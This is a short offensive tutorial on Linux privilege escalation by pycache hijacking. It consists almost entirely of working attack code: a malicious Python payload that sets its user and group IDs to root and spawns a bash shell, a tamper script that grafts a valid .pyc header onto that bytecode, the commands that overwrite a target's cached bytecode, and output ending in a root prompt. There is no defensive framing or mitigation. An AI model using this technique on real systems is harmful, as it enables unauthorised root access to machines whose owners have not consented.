Linux Privilege Escalation

pycache Hijack

First we need to create the malicious python file:

1
import os
2

3
print("Test hijacked")
4

5
os.setuid(0)
6
os.setgid(0)
7
os.system("/bin/bash")

And then compile it:

$ python3 -m py_compile evil.py

Now we need to create the tamper.py file:

1
import os
2
original_pyc = "/<target>/__pycache__/targetname.cpython-312.pyc"
3

4
evil_pyc = "__pycache__/evil.cpython-312.pyc"
5
final_pyc = "evil.cpython-312.pyc"
6

7
print(f"[*] Reading header from {original_pyc}...")
8
with open(original_pyc, "rb") as f:
9
    header = f.read(16)
10

11
print(f"[*] Reading bytecode from {evil_pyc}...")
12
with open(evil_pyc, "rb") as f:
13
    f.seek(16)
14
    bytecode = f.read()
15

16
print(f"[*] Writing malicious file with VALID header to {final_pyc}...")
17
with open(final_pyc, "wb") as f:
18
    f.write(header + bytecode)
19

20
print("[+] Done! Ready to deploy.")

The tamper.py file will read the header from the original pyc file and the bytecode from the malicious pyc file and write it to a new file with the same header.

And then we need to run the tamper.py file:

$ python3 tamper.py
[*] Reading header from /<target>/__pycache__/targetname.cpython-312.pyc...
[*] Reading bytecode from __pycache__/evil.cpython-312.pyc...
[*] Writing malicious file with VALID header to evil.cpython-312.pyc...
[+] Done! Ready to deploy.

And then we need to move the malicious pyc file to the target:

$ mv evil.cpython-312.pyc /<target>/__pycache__/targetname.cpython-312.pyc

$ sudo python3 destination.py
Test hijacked
root@localhost:/tmp/.mm#